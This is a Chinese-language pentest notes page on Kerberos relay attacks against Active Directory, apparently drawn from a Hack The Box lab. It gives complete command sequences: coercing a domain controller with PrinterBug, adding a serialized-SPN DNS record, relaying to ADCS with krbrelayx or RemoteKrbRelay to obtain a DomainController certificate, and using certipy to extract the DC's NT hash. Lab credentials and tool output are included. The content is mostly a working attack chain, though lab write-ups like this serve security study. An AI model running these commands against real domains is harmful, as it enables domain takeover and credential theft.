Kerberos Relay
https://www.synacktiv.com/publications/relaying-kerberos-over-smb-using-krbrelayx
https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/
1. 利用
前置条件:
- 目标服务和客户端都不能强制执行加密或签名,因为我们没有执行这些操作所需的密钥(会话密钥),这与 NTLMRelay攻击类似
1.1. DCOM/RPC 本地激活
利用 DCOM 对象让系统向攻击者认证,需要有一台可以执行命令的域内机器
使用RemoteKrbRelay
#kerberos中继获取域控证书
RemoteKrbRelay.exe -adcs -template DomainController -victim dc-jpq225.cicada.vl -target dc-jpq225.cicada.vl -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3
#将base64格式的证书转换为文件
echo -ne "MIACAQMwgAYJKoZIhvcNAQcBoIAkgASCA+gwgDCABgkqhkiG9w0B..." | base64 -d > cert.p12
#使用证书进行认证
certipy auth -pfx cert.p12 -dc-ip 10.129.200.138 -domain cicada.vl
1.2. 序列化 SPN + DNS
通过注入序列化的SPN DNS记录,诱使目标发起kerberos认证,可以使得NTLM中继升级为Kerberos中继
添加DNS(但是要注意DNS的长度最大为63位字符、最小的序列化buffer长度为44位,)所以你的netbios_name长度最大为19位
netbios_name + 1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA
# 1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA 由于DNS长度限制,此是最短的的序列化buffer
客户端会请求 cifs/netbios_name 的 Kerberos 票据,但确会连接到 netbios_name1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA
例子: 使用krbrelayx进行中继
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada] └─# bloodyAD -u Rosie.Powell -p Cicada123 -d cicada.vl -k --host DC-JPQ225.cicada.vl add dnsRecord "DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" 10.10.14.86 [+] DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA has been successfully added ┌──(root㉿kali)-[~/Desktop/htb/VulnCicada] └─# nxc smb DC-JPQ225.cicada.vl -k -u rosie.powell -p Cicada123 -M coerce_plus -o L=DC-JPQ2251UWhRCAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA M=PrinterBug SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [*] x64 (name:DC-JPQ225) (domain:cicada.vl) (signing:True) (SMBv1:None) (NTLM:False) SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [+] cicada.vl\rosie.powell:Cicada123 COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, PrinterBug COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 Exploit Success, spoolss\RpcRemoteFindFirstPrinterChangeNotificationEx ┌──(root㉿kali)-[~/Desktop/htb/VulnCicada] └─# krbrelayx.py -t http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp --adcs --template DomainController [*] Protocol Client LDAP loaded.. [*] Protocol Client LDAPS loaded.. [*] Protocol Client SMB loaded.. [*] Protocol Client HTTPS loaded.. [*] Protocol Client HTTP loaded.. [*] Running in attack mode to single host [*] Running in kerberos relay mode because no credentials were specified. [*] Setting up SMB Server [*] Setting up HTTP Server on port 80 [*] Setting up DNS Server [*] Servers started, waiting for connections [*] SMBD: Received connection from 10.129.234.48 [*] HTTP server returned status code 200, treating as a successful login [*] Generating CSR... [*] CSR generated! [*] Getting certificate... [*] SMBD: Received connection from 10.129.234.48 [-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider' [*] SMBD: Received connection from 10.129.234.48 [-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider' [*] GOT CERTIFICATE! ID 92 [*] Writing PKCS#12 certificate to ./unknown5898$.pfx [*] Certificate successfully written to file ┌──(root㉿kali)-[~/Desktop/htb/VulnCicada] └─# certipy auth -pfx unknown7148\$.pfx -dc-ip 10.129.234.48 Certipy v5.0.3 - by Oliver Lyak (ly4k) [*] Certificate identities: [*] SAN DNS Host Name: 'DC-JPQ225.cicada.vl' [*] Security Extension SID: 'S-1-5-21-687703393-1447795882-66098247-1000' [*] Using principal: 'dc-jpq225$@cicada.vl' [*] Trying to get TGT... [*] Got TGT [*] Saving credential cache to 'dc-jpq225.ccache' [*] Wrote credential cache to 'dc-jpq225.ccache' [*] Trying to retrieve NT hash for 'dc-jpq225$' [*] Got hash for 'dc-jpq225$@cicada.vl': aad3b435b51404eeaad3b435b51404ee:a65952c664e9cf5de60195626edbeee3
使用certipy
certipy relay -target 'http://dc-jpq225.cicada.vl/' -template DomainController
bloodyAD -u Rosie.Powell -p Cicada123 -d cicada.vl -k --host DC-JPQ225.cicada.vl add dnsRecord DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA 10.10.14.86
nxc smb DC-JPQ225.cicada.vl -k --use-kcache -M coerce_plus -o L=DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA M=PrinterBug
certipy auth -pfx dc-jpq225.pfx -dc-ip 10.129.200.138
下面为AI的解释,
目标地址格式
│
├── IP 地址 (如 10.10.10.10)
│ └── ❌ 无法构造 SPN → 使用 NTLM
│
├── NetBIOS 名称 (如 DC01)
│ └── 尝试 Kerberos → 可能回落 NTLM
│
├── FQDN (如 dc01.domain.local)
│ └── 尝试 Kerberos (SPN: HOST/dc01.domain.local)
│ → 如果失败,回落 NTLM
│
└── 序列化 SPN 格式 (如 DC-JPQ2251UWhRC...)
└── ✅ 强制 Kerberos,不回落 NTLM